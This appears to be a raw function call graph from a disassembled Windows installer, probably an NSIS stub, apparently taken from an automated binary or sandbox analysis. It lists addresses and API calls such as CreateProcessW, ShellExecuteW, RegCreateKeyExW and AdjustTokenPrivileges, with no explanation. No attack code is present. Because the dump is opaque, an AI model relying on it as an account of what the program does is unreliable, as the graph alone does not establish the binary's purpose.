402925 5222 4033ec ReadFile 5221->5222 5223 40292e GlobalAlloc 5222->5223 5224 402972 5223->5224 5225 40293e 5223->5225 5227 405e99 WriteFile 5224->5227 5226 40317b 45 API calls 5225->5226 5232 40294b 5226->5232 5228 40297e GlobalFree 5227->5228 5229 40317b 45 API calls 5228->5229 5231 402991 5229->5231 5230 402969 GlobalFree 5230->5224 5231->5218 5232->5230 5233->5213 5234->5221 5235 404ac7 5236 404af3 5235->5236 5237 404ad7 5235->5237 5238 404b26 5236->5238 5239 404af9 SHGetPathFromIDListW 5236->5239 5246 40593b GetDlgItemTextW 5237->5246 5241 404b10 SendMessageW 5239->5241 5242 404b09 5239->5242 5241->5238 5244 40140b 2 API calls 5242->5244 5243 404ae4 SendMessageW 5243->5236 5244->5241 5246->5243 4276 40344a SetErrorMode GetVersion 4277 403485 4276->4277 4278 40347f 4276->4278 4280 40657c 3 API calls 4277->4280 4279 4065ec 5 API calls 4278->4279 4279->4277 4281 40349b lstrlenA 4280->4281 4281->4277 4282 4034ab 4281->4282 4283 4065ec 5 API calls 4282->4283 4284 4034b3 4283->4284 4285 4065ec 5 API calls 4284->4285 4286 4034ba #17 OleInitialize SHGetFileInfoW 4285->4286 4364 406212 lstrcpynW 4286->4364 4288 4034f7 GetCommandLineW 4365 406212 lstrcpynW 4288->4365 4290 403509 GetModuleHandleW 4291 403521 4290->4291 4292 405bf3 CharNextW 4291->4292 4293 403530 CharNextW 4292->4293 4294 40365a GetTempPathW 4293->4294 4302 403549 4293->4302 4366 403419 4294->4366 4296 403672 4297 403676 GetWindowsDirectoryW lstrcatW 4296->4297 4298 4036cc DeleteFileW 4296->4298 4299 403419 12 API calls 4297->4299 4376 402ed5 GetTickCount GetModuleFileNameW 4298->4376 4303 403692 4299->4303 4300 405bf3 CharNextW 4300->4302 4302->4300 4307 403645 4302->4307 4309 403643 4302->4309 4303->4298 4305 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4303->4305 4304 4036e0 4313 405bf3 CharNextW 4304->4313 4347 403783 4304->4347 4359 403793 4304->4359 4308 403419 12 API calls 4305->4308 4462 406212 lstrcpynW 4307->4462 4311 4036c4 4308->4311 4309->4294 4311->4298 4311->4359 4326 4036ff 4313->4326 4315 4038cd 4318 403951 ExitProcess 4315->4318 4319 4038d5 GetCurrentProcess OpenProcessToken 4315->4319 4316 4037ad 4474 405957 4316->4474 4324 403921 4319->4324 4325 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 4319->4325 4321 4037c3 4328 4058da 5 API calls 4321->4328 4322 40375d 4327 405cce 18 API calls 4322->4327 4329 4065ec 5 API calls 4324->4329 4325->4324 4326->4321 4326->4322 4330 403769 4327->4330 4331 4037c8 lstrcatW 4328->4331 4334 403928 4329->4334 4330->4359 4463 406212 lstrcpynW 4330->4463 4332 4037e4 lstrcatW lstrcmpiW 4331->4332 4333 4037d9 lstrcatW 4331->4333 4338 403800 4332->4338 4332->4359 4333->4332 4335 40393d ExitWindowsEx 4334->4335 4336 40394a 4334->4336 4335->4318 4335->4336 4483 40140b 4336->4483 4341 403805 4338->4341 4342 40380c 4338->4342 4340 403778 4464 406212 lstrcpynW 4340->4464 4345 405840 4 API calls 4341->4345 4343 4058bd 2 API calls 4342->4343 4346 403811 SetCurrentDirectoryW 4343->4346 4348 40380a 4345->4348 4349 403821 4346->4349 4350 40382c 4346->4350 4406 403a5b 4347->4406 4348->4346 4478 406212 lstrcpynW 4349->4478 4479 406212 lstrcpynW 4350->4479 4353 406234 18 API calls 4354 40386b DeleteFileW 4353->4354 4355 403878 CopyFileW 4354->4355 4361 40383a 4354->4361 4355->4361 4356 4038c1 4357 4060b3 38 API calls 4356->4357 4357->4359 4358 4060b3 38 API calls 4358->4361 4465 403969 4359->4465 4360 406234 18 API calls 4360->4361 4361->4353 4361->4356 4361->4358 4361->4360 4363 4038ac CloseHandle 4361->4363 4480 4058f2 CreateProcessW 4361->4480 4363->4361 4364->4288 4365->4290 4367 4064a6 5 API calls 4366->4367 4368 403425 4367->4368 4369 40342f 4368->4369 4370 405bc6 3 API calls 4368->4370 4369->4296 4371 403437 4370->4371 4372 4058bd 2 API calls 4371->4372 4373 40343d 4372->4373 4486 405e16 4373->4486 4490 405de7 GetFileAttributesW CreateFileW 4376->4490 4378 402f18 4405 402f25 4378->4405 4491 406212 lstrcpynW 4378->4491 4380 402f3b 4381 405c12 2 API calls 4380->4381 4382 402f41 4381->4382 4492 406212 lstrcpynW 4382->4492 4384 402f4c GetFileSize 4385 40304d 4384->4385 4403 402f63 4384->4403 4493 402e33 4385->4493 4389 4030e8 4392 402e33 33 API calls 4389->4392 4390 403090 GlobalAlloc 4391 4030a7 4390->4391 4395 405e16 2 API calls 4391->4395 4392->4405 4394 403071 4396 4033ec ReadFile 4394->4396 4398 4030b8 CreateFileW 4395->4398 4399 40307c 4396->4399 4397 402e33 33 API calls 4397->4403 4400 4030f2 4398->4400 4398->4405 4399->4390 4399->4405 4508 403402 SetFilePointer 4400->4508 4402 403100 4509 40317b 4402->4509 4403->4385 4403->4389 4403->4397 4403->4405 4524 4033ec 4403->4524 4405->4304 4407 4065ec 5 API calls 4406->4407 4408 403a6f 4407->4408 4409 403a75 4408->4409 4410 403a87 4408->4410 4572 406159 wsprintfW 4409->4572 4411 4060df 3 API calls 4410->4411 4412 403ab7 4411->4412 4414 403ad6 lstrcatW 4412->4414 4416 4060df 3 API calls 4412->4416 4415 403a85 4414->4415 4556 403d31 4415->4556 4416->4414 4419 405cce 18 API calls 4420 403b08 4419->4420 4421 403b9c 4420->4421 4423 4060df 3 API calls 4420->4423 4422 405cce 18 API calls 4421->4422 4426 403ba2 4422->4426 4424 403b3a 4423->4424 4424->4421 4431 403b5b lstrlenW 4424->4431 4434 405bf3 CharNextW 4424->4434 4425 403bb2 LoadImageW 4428 403c58 4425->4428 4429 403bd9 RegisterClassW 4425->4429 4426->4425 4427 406234 18 API calls 4426->4427 4427->4425 4430 40140b 2 API calls 4428->4430 4432 403c0f SystemParametersInfoW CreateWindowExW 4429->4432 4461 403c62 4429->4461 4433 403c5e 4430->4433 4435 403b69 lstrcmpiW 4431->4435 4436 403b8f 4431->4436 4432->4428 4441 403d31 19 API calls 4433->4441 4433->4461 4438 403b58 4434->4438 4435->4436 4439 403b79 GetFileAttributesW 4435->4439 4437 405bc6 3 API calls 4436->4437 4442 403b95 4437->4442 4438->4431 4440 403b85 4439->4440 4440->4436 4443 405c12 2 API calls 4440->4443 4444 403c6f 4441->4444 4573 406212 lstrcpynW 4442->4573 4443->4436 4446 403c7b ShowWindow 4444->4446 4447 403cfe 4444->4447 4449 40657c 3 API calls 4446->4449 4565 405444 OleInitialize 4447->4565 4451 403c93 4449->4451 4450 403d04 4452 403d20 4450->4452 4453 403d08 4450->4453 4454 403ca1 GetClassInfoW 4451->4454 4456 40657c 3 API calls 4451->4456 4455 40140b 2 API calls 4452->4455 4459 40140b 2 API calls 4453->4459 4453->4461 4457 403cb5 GetClassInfoW RegisterClassW 4454->4457 4458 403ccb DialogBoxParamW 4454->4458 4455->4461 4456->4454 4457->4458 4460 40140b 2 API calls 4458->4460 4459->4461 4460->4461 4461->4359 4462->4309 4463->4340 4464->4347 4466 403984 4465->4466 4467 40397a CloseHandle 4465->4467 4468 403998 4466->4468 4469 40398e CloseHandle 4466->4469 4467->4466 4582 4039c6 4468->4582 4469->4468 4472 405a03 69 API calls 4473 40379c OleUninitialize 4472->4473 4473->4315 4473->4316 4475 40596c 4474->4475 4476 405980 MessageBoxIndirectW 4475->4476 4477 4037bb ExitProcess 4475->4477 4476->4477 4478->4350 4479->4361 4481 405931 4480->4481 4482 405925 CloseHandle 4480->4482 4481->4361 4482->4481 4484 401389 2 API calls 4483->4484 4485 401420 4484->4485 4485->4318 4487 405e23 GetTickCount GetTempFileNameW 4486->4487 4488 403448 4487->4488 4489 405e59 4487->4489 4488->4296 4489->4487 4489->4488 4490->4378 4491->4380 4492->4384 4494 402e44 4493->4494 4495 402e5c 4493->4495 4496 402e4d DestroyWindow 4494->4496 4502 402e54 4494->4502 4497 402e64 4495->4497 4498 402e6c GetTickCount 4495->4498 4496->4502 4528 406628 4497->4528 4499 402e7a 4498->4499 4498->4502 4501 402eaf CreateDialogParamW ShowWindow 4499->4501 4503 402e82 4499->4503 4501->4502 4502->4390 4502->4405 4527 403402 SetFilePointer 4502->4527 4503->4502 4532 402e17 4503->4532 4505 402e90 wsprintfW 4506 405371 25 API calls 4505->4506 4507 402ead 4506->4507 4507->4502 4508->4402 4510 4031a6 4509->4510 4511 40318a SetFilePointer 4509->4511 4535 403283 GetTickCount 4510->4535 4511->4510 4514 403243 4514->4405 4515 405e6a ReadFile 4516 4031c6 4515->4516 4516->4514 4517 403283 43 API calls 4516->4517 4518 4031dd 4517->4518 4518->4514 4519 403249 ReadFile 4518->4519 4521 4031ec 4518->4521 4519->4514 4521->4514 4522 405e6a ReadFile 4521->4522 4523 405e99 WriteFile 4521->4523 4522->4521 4523->4521 4525 405e6a ReadFile 4524->4525 4526 4033ff 4525->4526 4526->4403 4527->4394 4529 406645 PeekMessageW 4528->4529 4530 406655 4529->4530 4531 40663b DispatchMessageW 4529->4531 4530->4502 4531->4529 4533 402e26 4532->4533 4534 402e28 MulDiv 4532->4534 4533->4534 4534->4505 4536 4032b1 4535->4536 4537 4033db 4535->4537 4548 403402 SetFilePointer 4536->4548 4538 402e33 33 API calls 4537->4538 4540 4031ad 4538->4540 4540->4514 4540->4515 4541 4032bc SetFilePointer 4543 4032e1 4541->4543 4542 4033ec ReadFile 4542->4543 4543->4540 4543->4542 4545 402e33 33 API calls 4543->4545 4546 405e99 WriteFile 4543->4546 4547 4033bc SetFilePointer 4543->4547 4549 40672b 4543->4549 4545->4543 4546->4543 4547->4537 4548->4541 4550 406750 4549->4550 4553 406758 4549->4553 4550->4543 4551 4067e8 GlobalAlloc 4551->4550 4551->4553 4552 4067df GlobalFree 4552->4551 4553->4550 4553->4551 4553->4552 4554 406856 GlobalFree 4553->4554 4555 40685f GlobalAlloc 4553->4555 4554->4555 4555->4550 4555->4553 4557 403d45 4556->4557 4574 406159 wsprintfW 4557->4574 4559 403db6 4560 406234 18 API calls 4559->4560 4561 403dc2 SetWindowTextW 4560->4561 4562 403ae6 4561->4562 4563 403dde 4561->4563 4562->4419 4563->4562 4564 406234 18 API calls 4563->4564 4564->4563 4575 404322 4565->4575 4567 404322 SendMessageW 4569 4054a0 OleUninitialize 4567->4569 4568 405467 4571 40548e 4568->4571 4578 401389 4568->4578 4569->4450 4571->4567 4572->4415 4573->4421 4574->4559 4576 40433a 4575->4576 4577 40432b SendMessageW 4575->4577 4576->4568 4577->4576 4580 401390 4578->4580 4579 4013fe 4579->4568 4580->4579 4581 4013cb MulDiv SendMessageW 4580->4581 4581->4580 4583 4039d4 4582->4583 4584 40399d 4583->4584 4585 4039d9 FreeLibrary GlobalFree 4583->4585 4584->4472 4585->4584 4585->4585 5247 402a4b 5248 402c31 18 API calls 5247->5248 5249 402a51 5248->5249 5250 402a88 5249->5250 5251 4028a1 5249->5251 5253 402a63 5249->5253 5250->5251 5252 406234 18 API calls 5250->5252 5252->5251 5253->5251 5255 406159 wsprintfW 5253->5255 5255->5251 5259 4016cc 5260 402c53 18 API calls 5259->5260 5261 4016d2 GetFullPathNameW 5260->5261 5262 40170e 5261->5262 5263 4016ec 5261->5263 5264 401723 GetShortPathNameW 5262->5264 5265 402adb 5262->5265 5263->5262 5266 406555 2 API calls 5263->5266 5264->5265 5267 4016fe 5266->5267 5267->5262 5269 406212 lstrcpynW 5267->5269 5269->5262 5270 401b4d 5271 402c53 18 API calls 5270->5271 5272 401b54 5271->5272 5273 402c31 18 API calls 5272->5273 5274 401b5d wsprintfW 5273->5274 5275 402adb 5274->5275 5283 40234e 5284 402c53 18 API calls 5283->5284 5285 40235d 5284->5285 5286 402c53 18 API calls 5285->5286 5287 402366 5286->5287 5288 402c53 18 API calls 5287->5288 5289 402370 GetPrivateProfileStringW 5288->5289 5290 402851 5291 402859 5290->5291 5292 40285d FindNextFileW 5291->5292 5294 40286f 5291->5294 5293 4028b6 5292->5293 5292->5294 5296 406212 lstrcpynW 5293->5296 5296->5294 4633 401ed5 4634 402c53 18 API calls 4633->4634 4635 401edb 4634->4635 4636 405371 25 API calls 4635->4636 4637 401ee5 4636->4637 4638 4058f2 2 API calls 4637->4638 4639 401eeb 4638->4639 4640 401f4a CloseHandle 4639->4640 4641 401efb WaitForSingleObject 4639->4641 4643 4028a1 4639->4643 4640->4643 4642 401f0d 4641->4642 4644 401f1f GetExitCodeProcess 4642->4644 4645 406628 2 API calls 4642->4645 4646 401f31 4644->4646 4647 401f3c 4644->4647 4648 401f14 WaitForSingleObject 4645->4648 4650 406159 wsprintfW 4646->4650 4647->4640 4648->4642 4650->4647 5297 401956 5298 402c53 18 API calls 5297->5298 5299 40195d lstrlenW 5298->5299 5300 4025a8 5299->5300 4651 4014d7 4652 402c31 18 API calls 4651->4652 4653 4014dd Sleep 4652->4653 4655 402adb 4653->4655 5301 401f58 5302 402c53 18 API calls 5301->5302 5303 401f5f 5302->5303 5304 406555 2 API calls 5303->5304 5305 401f65 5304->5305 5307 401f76 5305->5307 5308 406159 wsprintfW 5305->5308 5308->5307 5309 402259 5310 402c53 18 API calls 5309->5310 5311 40225f 5310->5311 5312 402c53 18 API calls 5311->5312 5313 402268 5312->5313 5314 402c53 18 API calls 5313->5314 5315 402271 5314->5315 5316 406555 2 API calls 5315->5316 5317 40227a 5316->5317 5318 40228b lstrlenW lstrlenW 5317->5318 5322 40227e 5317->5322 5320 405371 25 API calls 5318->5320 5319 405371 25 API calls 5323 402286 5319->5323 5321 4022c9 SHFileOperationW 5320->5321 5321->5322 5321->5323 5322->5319 5322->5323 5324 4068da 5326 40675e 5324->5326 5325 4070c9 5326->5325 5327 4067e8 GlobalAlloc 5326->5327 5328 4067df GlobalFree 5326->5328 5329 406856 GlobalFree 5326->5329 5330 40685f GlobalAlloc 5326->5330 5327->5325 5327->5326 5328->5327 5329->5330 5330->5325 5330->5326 4678 40175c 4679 402c53 18 API calls 4678->4679 4680 401763 4679->4680 4681 405e16 2 API calls 4680->4681 4682 40176a 4681->4682 4683 405e16 2 API calls 4682->4683 4683->4682 5331 4022dd 5332 4022e4 5331->5332 5336 4022f7 5331->5336 5333 406234 18 API calls 5332->5333 5334 4022f1 5333->5334 5335 405957 MessageBoxIndirectW 5334->5335 5335->5336 4696 402660 4697 402c31 18 API calls 4696->4697 4706 40266f 4697->4706 4698 4027ac 4699 4026b9 ReadFile 4699->4698 4699->4706 4700 402752 4700->4698 4700->4706 4710 405ec8 SetFilePointer 4700->4710 4701 405e6a ReadFile 4701->4706 4703 4026f9 MultiByteToWideChar 4703->4706 4704 4027ae 4719 406159 wsprintfW 4704->4719 4706->4698 4706->4699 4706->4700 4706->4701 4706->4703 4706->4704 4707 40271f SetFilePointer MultiByteToWideChar 4706->4707 4708 4027bf 4706->4708 4707->4706 4708->4698 4709 4027e0 SetFilePointer 4708->4709 4709->4698 4711 405ee4 4710->4711 4717 405f00 4710->4717 4712 405e6a ReadFile 4711->4712 4713 405ef0 4712->4713 4714 405f31 SetFilePointer 4713->4714 4715 405f09 SetFilePointer 4713->4715 4713->4717 4714->4717 4715->4714 4716 405f14 4715->4716 4718 405e99 WriteFile 4716->4718 4717->4700 4718->4717 4719->4698 5337 401563 5338 402a81 5337->5338 5341 406159 wsprintfW 5338->5341 5340 402a86 5341->5340 5349 4052e5 5350 4052f5 5349->5350 5351 405309 5349->5351 5353 405352 5350->5353 5354 4052fb 5350->5354 5352 405311 IsWindowVisible 5351->5352 5360 405328 5351->5360 5352->5353 5356 40531e 5352->5356 5357 405357 CallWindowProcW 5353->5357 5355 404322 SendMessageW 5354->5355 5358 405305 5355->5358 5362 404c3b SendMessageW 5356->5362 5357->5358 5360->5357 5367 404cbb 5360->5367 5363 404c9a SendMessageW 5362->5363 5364 404c5e GetMessagePos ScreenToClient SendMessageW 5362->5364 5365 404c92 5363->5365 5364->5365 5366 404c97 5364->5366 5365->5360 5366->5363 5376 406212 lstrcpynW 5367->5376 5369 404cce 5377 406159 wsprintfW 5369->5377 5371 404cd8 5372 40140b 2 API calls 5371->5372 5373 404ce1 5372->5373 5378 406212 lstrcpynW 5373->5378 5375 404ce8 5375->5353 5376->5369 5377->5371 5378->5375 5379 401968 5380 402c31 18 API calls 5379->5380 5381 40196f 5380->5381 5382 402c31 18 API calls 5381->5382 5383 40197c 5382->5383 5384 402c53 18 API calls 5383->5384 5385 401993 lstrlenW 5384->5385 5386 4019a4 5385->5386 5387 4019e5 5386->5387 5391 406212 lstrcpynW 5386->5391 5389 4019d5 5389->5387 5390 4019da lstrlenW 5389->5390 5390->5387 5391->5389 5392 100018a9 5393 100018cc 5392->5393 5394 100018ff GlobalFree 5393->5394 5395 10001911 5393->5395 5394->5395 5396 10001272 2 API calls 5395->5396 5397 10001a87 GlobalFree GlobalFree 5396->5397 4724 4023ea 4725 4023f0 4724->4725 4726 402c53 18 API calls 4725->4726 4727 402402 4726->4727 4728 402c53 18 API calls 4727->4728 4729 40240c RegCreateKeyExW 4728->4729 4730 402436 4729->4730 4740 4028a1 4729->4740 4731 402451 4730->4731 4733 402c53 18 API calls 4730->4733 4732 40245d 4731->4732 4734 402c31 18 API calls 4731->4734 4735 40247c RegSetValueExW 4732->4735 4737 40317b 45 API calls 4732->4737 4736 402447 lstrlenW 4733->4736 4734->4732 4738 402492 RegCloseKey 4735->4738 4736->4731 4737->4735 4738->4740 5398 40166a 5399 402c53 18 API calls 5398->5399 5400 401670 5399->5400 5401 406555 2 API calls 5400->5401 5402 401676 5401->5402 5403 4043ea lstrcpynW lstrlenW 5404 404ced GetDlgItem GetDlgItem 5405 404d3f 7 API calls 5404->5405 5410 404f58 5404->5410 5406 404de2 DeleteObject 5405->5406 5407 404dd5 SendMessageW 5405->5407 5408 404deb 5406->5408 5407->5406 5409 404e22 5408->5409 5413 406234 18 API calls 5408->5413 5411 4042d6 19 API calls 5409->5411 5419 404c3b 5 API calls 5410->5419 5424 40503c 5410->5424 5438 404fc9 5410->5438 5414 404e36 5411->5414 5412 4050e8 5416 4050f2 SendMessageW 5412->5416 5417 4050fa 5412->5417 5418 404e04 SendMessageW SendMessageW 5413->5418 5420 4042d6 19 API calls 5414->5420 5415 404f4b 5422 40433d 8 API calls 5415->5422 5416->5417 5425 405113 5417->5425 5426 40510c ImageList_Destroy 5417->5426 5434 405123 5417->5434 5418->5408 5419->5438 5439 404e44 5420->5439 5421 405095 SendMessageW 5421->5415 5428 4050aa SendMessageW 5421->5428 5429 4052de 5422->5429 5423 40502e SendMessageW 5423->5424 5424->5412 5424->5415 5424->5421 5430 40511c GlobalFree 5425->5430 5425->5434 5426->5425 5427 405292 5427->5415 5435 4052a4 ShowWindow GetDlgItem ShowWindow 5427->5435 5432 4050bd 5428->5432 5430->5434 5431 404f19 GetWindowLongW SetWindowLongW 5433 404f32 5431->5433 5443 4050ce SendMessageW 5432->5443 5436 404f50 5433->5436 5437 404f38 ShowWindow 5433->5437 5434->5427 5447 404cbb 4 API calls 5434->5447 5451 40515e 5434->5451 5435->5415 5456 40430b SendMessageW 5436->5456 5455 40430b SendMessageW 5437->5455 5438->5423 5438->5424 5439->5431 5442 404e94 SendMessageW 5439->5442 5444 404f13 5439->5444 5445 404ed0 SendMessageW 5439->5445 5446 404ee1 SendMessageW 5439->5446 5442->5439 5443->5412 5444->5431 5444->5433 5445->5439 5446->5439 5447->5451 5448 405268 InvalidateRect 5448->5427 5449 40527e 5448->5449 5457 404bf6 5449->5457 5450 40518c SendMessageW 5454 4051a2 5450->5454 5451->5450 5451->5454 5453 405216 SendMessageW SendMessageW 5453->5454 5454->5448 5454->5453 5455->5415 5456->5410 5460 404b2d 5457->5460 5459 404c0b 5459->5427 5461 404b46 5460->5461 5462 406234 18 API calls 5461->5462 5463 404baa 5462->5463 5464 406234 18 API calls 5463->5464 5465 404bb5 5464->5465 5466 406234 18 API calls 5465->5466 5467 404bcb lstrlenW wsprintfW SetDlgItemTextW 5466->5467 5467->5459 5468 401ced 5469 402c31 18 API calls 5468->5469 5470 401cf3 IsWindow 5469->5470 5471 401a20 5470->5471 4758 40176f 4759 402c53 18 API calls 4758->4759 4760 401776 4759->4760 4761 401796 4760->4761 4762 40179e 4760->4762 4797 406212 lstrcpynW 4761->4797 4798 406212 lstrcpynW 4762->4798 4765 4017a9 4767 405bc6 3 API calls 4765->4767 4766 40179c 4769 4064a6 5 API calls 4766->4769 4768 4017af lstrcatW 4767->4768 4768->4766 4786 4017bb 4769->4786 4770 406555 2 API calls 4770->4786 4772 405dc2 2 API calls 4772->4786 4773 4017cd CompareFileTime 4773->4786 4774 40188d 4776 405371 25 API calls 4774->4776 4775 401864 4777 405371 25 API calls 4775->4777 4785 401879 4775->4785 4779 401897 4776->4779 4777->4785 4778 406212 lstrcpynW 4778->4786 4780 40317b 45 API calls 4779->4780 4781 4018aa 4780->4781 4782 4018be SetFileTime 4781->4782 4784 4018d0 CloseHandle 4781->4784 4782->4784 4783 406234 18 API calls 4783->4786 4784->4785 4787 4018e1 4784->4787 4786->4770 4786->4772 4786->4773 4786->4774 4786->4775 4786->4778 4786->4783 4794 405957 MessageBoxIndirectW 4786->4794 4796 405de7 GetFileAttributesW CreateFileW 4786->4796 4788 4018e6 4787->4788 4789 4018f9 4787->4789 4790 406234 18 API calls 4788->4790 4791 406234 18 API calls 4789->4791 4792 4018ee lstrcatW 4790->4792 4793 401901 4791->4793 4792->4793 4795 405957 MessageBoxIndirectW 4793->4795 4794->4786 4795->4785 4796->4786 4797->4766 4798->4765 4869 401b71 4870 401bc2 4869->4870 4871 401b7e 4869->4871 4873 401bc7 4870->4873 4874 401bec GlobalAlloc 4870->4874 4872 401c07 4871->4872 4878 401b95 4871->4878 4876 406234 18 API calls 4872->4876 4882 4022f7 4872->4882 4873->4882 4890 406212 lstrcpynW 4873->4890 4875 406234 18 API calls 4874->4875 4875->4872 4879 4022f1 4876->4879 4888 406212 lstrcpynW 4878->4888 4884 405957 MessageBoxIndirectW 4879->4884 4880 401bd9 GlobalFree 4880->4882 4883 401ba4 4889 406212 lstrcpynW 4883->4889 4884->4882 4886 401bb3 4891 406212 lstrcpynW 4886->4891 4888->4883 4889->4886 4890->4880 4891->4882 5472 404771 5473 40479d 5472->5473 5474 4047ae 5472->5474 5533 40593b GetDlgItemTextW 5473->5533 5476 4047ba GetDlgItem 5474->5476 5477 404819 5474->5477 5479 4047ce 5476->5479 5485 406234 18 API calls 5477->5485 5495 4048fd 5477->5495 5531 404aac 5477->5531 5478 4047a8 5480 4064a6 5 API calls 5478->5480 5481 4047e2 SetWindowTextW 5479->5481 5483 405c71 4 API calls 5479->5483 5480->5474 5484 4042d6 19 API calls 5481->5484 5492 4047d8 5483->5492 5489 4047fe 5484->5489 5490 40488d SHBrowseForFolderW 5485->5490 5486 40492d 5491 405cce 18 API calls 5486->5491 5487 40433d 8 API calls 5488 404ac0 5487->5488 5493 4042d6 19 API calls 5489->5493 5494 4048a5 CoTaskMemFree 5490->5494 5490->5495 5496 404933 5491->5496 5492->5481 5497 405bc6 3 API calls 5492->5497 5498 40480c 5493->5498 5499 405bc6 3 API calls 5494->5499 5495->5531 5535 40593b GetDlgItemTextW 5495->5535 5536 406212 lstrcpynW 5496->5536 5497->5481 5534 40430b SendMessageW 5498->5534 5501 4048b2 5499->5501 5504 4048e9 SetDlgItemTextW 5501->5504 5508 406234 18 API calls 5501->5508 5503 404812 5506 4065ec 5 API calls 5503->5506 5504->5495 5505 40494a 5507 4065ec 5 API calls 5505->5507 5506->5477 5514 404951 5507->5514 5509 4048d1 lstrcmpiW 5508->5509 5509->5504 5512 4048e2 lstrcatW 5509->5512 5510 404992 5537 406212 lstrcpynW 5510->5537 5512->5504 5513 404999 5515 405c71 4 API calls 5513->5515 5514->5510 5518 405c12 2 API calls 5514->5518 5520 4049ea 5514->5520 5516 40499f GetDiskFreeSpaceW 5515->5516 5519 4049c3 MulDiv 5516->5519 5516->5520 5518->5514 5519->5520 5521 404a5b 5520->5521 5523 404bf6 21 API calls 5520->5523 5522 404a7e 5521->5522 5524 40140b 2 API calls 5521->5524 5538 4042f8 KiUserCallbackDispatcher 5522->5538 5525 404a48 5523->5525 5524->5522 5527 404a5d SetDlgItemTextW 5525->5527 5528 404a4d 5525->5528 5527->5521 5530 404b2d 21 API calls 5528->5530 5529 404a9a 5529->5531 5539 404706 5529->5539 5530->5521 5531->5487 5533->5478 5534->5503 5535->5486 5536->5505 5537->5513 5538->5529 5540 404714 5539->5540 5541 404719 SendMessageW 5539->5541 5540->5541 5541->5531 5542 401a72 5543 402c31 18 API calls 5542->5543 5544 401a78 5543->5544 5545 402c31 18 API calls 5544->5545 5546 401a20 5545->5546 5075 401573 5076 401583 ShowWindow 5075->5076 5077 40158c 5075->5077 5076->5077 5078 40159a ShowWindow 5077->5078 5079 402adb 5077->5079 5078->5079 5547 404473 5548 40448b 5547->5548 5552 4045a5 5547->5552 5553 4042d6 19 API calls 5548->5553 5549 40460f 5550 4046e1 5549->5550 5551 404619 GetDlgItem 5549->5551 5558 40433d 8 API calls 5550->5558 5554 404633 5551->5554 5555 4046a2 5551->5555 5552->5549 5552->5550 5556 4045e0 GetDlgItem SendMessageW 5552->5556 5557 4044f2 5553->5557 5554->5555 5559 404659 6 API calls 5554->5559 5555->5550 5560 4046b4 5555->5560 5578 4042f8 KiUserCallbackDispatcher 5556->5578 5562 4042d6 19 API calls 5557->5562 5563 4046dc 5558->5563 5559->5555 5564 4046ca 5560->5564 5565 4046ba SendMessageW 5560->5565 5567 4044ff CheckDlgButton 5562->5567 5564->5563 5568 4046d0 SendMessageW 5564->5568 5565->5564 5566 40460a 5569 404706 SendMessageW 5566->5569 5576 4042f8 KiUserCallbackDispatcher 5567->5576 5568->5563 5569->5549 5571 40451d GetDlgItem 5577 40430b SendMessageW 5571->5577 5573 404533 SendMessageW 5574 404550 GetSysColor 5573->5574 5575 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5573->5575 5574->5575 5575->5563 5576->5571 5577->5573 5578->5566 5579 4014f5 SetForegroundWindow 5580 402adb 5579->5580 5581 100016b6 5582 100016e5 5581->5582 5583 10001b18 22 API calls 5582->5583 5584 100016ec 5583->5584 5585 100016f3 5584->5585 5586 100016ff 5584->5586 5589 10001272 2 API calls 5585->5589 5587 10001726 5586->5587 5588 10001709 5586->5588 5592 10001750 5587->5592 5593 1000172c 5587->5593 5591 1000153d 3 API calls 5588->5591 5590 100016fd 5589->5590 5595 1000170e 5591->5595 5594 1000153d 3 API calls 5592->5594 5596 100015b4 3 API calls 5593->5596 5594->5590 5597 100015b4 3 API calls 5595->5597 5598 10001731 5596->5598 5599 10001714 5597->5599 5600 10001272 2 API calls 5598->5600 5601 10001272 2 API calls 5599->5601 5602 10001737 GlobalFree 5600->5602 5603 1000171a GlobalFree 5601->5603 5602->5590 5604 1000174b GlobalFree 5602->5604 5603->5590 5604->5590 5092 401e77 5093 402c53 18 API calls 5092->5093 5094 401e7d 5093->5094 5095 402c53 18 API calls 5094->5095 5096 401e86 5095->5096 5097 402c53 18 API calls 5096->5097 5098 401e8f 5097->5098 5099 402c53 18 API calls 5098->5099 5100 401e98 5099->5100 5101 401423 25 API calls 5100->5101 5102 401e9f ShellExecuteW 5101->5102 5103 401ed0 5102->5103 5605 10002238 5606 10002296 5605->5606 5607 100022cc 5605->5607 5606->5607 5608 100022a8 GlobalAlloc 5606->5608 5608->5606 5104 40167b 5105 402c53 18 API calls 5104->5105 5106 401682 5105->5106 5107 402c53 18 API calls 5106->5107 5108 40168b 5107->5108 5109 402c53 18 API calls 5108->5109 5110 401694 MoveFileW 5109->5110 5111 4016a7 5110->5111 5117 4016a0 5110->5117 5113 406555 2 API calls 5111->5113 5115 402250 5111->5115 5112 401423 25 API calls 5112->5115 5114 4016b6 5113->5114 5114->5115 5116 4060b3 38 API calls 5114->5116 5116->5117 5117->5112 5616 1000103d 5617 1000101b 5 API calls 5616->5617 5618 10001056 5617->5618 5118 403dfe 5119 403f51 5118->5119 5120 403e16 5118->5120 5122 403f62 GetDlgItem GetDlgItem 5119->5122 5123 403fa2 5119->5123 5120->5119 5121 403e22 5120->5121 5125 403e40 5121->5125 5126 403e2d SetWindowPos 5121->5126 5127 4042d6 19 API calls 5122->5127 5124 403ffc 5123->5124 5132 401389 2 API calls 5123->5132 5128 404322 SendMessageW 5124->5128 5133 403f4c 5124->5133 5129 403e45 ShowWindow 5125->5129 5130 403e5d 5125->5130 5126->5125 5131 403f8c SetClassLongW 5127->5131 5157 40400e 5128->5157 5129->5130 5134 403e65 DestroyWindow 5130->5134 5135 403e7f 5130->5135 5136 40140b 2 API calls 5131->5136 5140 403fd4 5132->5140 5137 40425f 5134->5137 5138 403e84 SetWindowLongW 5135->5138 5139 403e95 5135->5139 5136->5123 5137->5133 5149 404290 ShowWindow 5137->5149 5138->5133 5141 403ea1 GetDlgItem 5139->5141 5142 403f3e 5139->5142 5140->5124 5143 403fd8 SendMessageW 5140->5143 5146 403ed1 5141->5146 5147 403eb4 SendMessageW IsWindowEnabled 5141->5147 5148 40433d 8 API calls 5142->5148 5143->5133 5144 40140b 2 API calls 5144->5157 5145 404261 DestroyWindow EndDialog 5145->5137 5151 403ede 5146->5151 5154 403f25 SendMessageW 5146->5154 5155 403ef1 5146->5155 5163 403ed6 5146->5163 5147->5133 5147->5146 5148->5133 5149->5133 5150 406234 18 API calls 5150->5157 5151->5154 5151->5163 5152 4042af SendMessageW 5156 403f0c 5152->5156 5153 4042d6 19 API calls 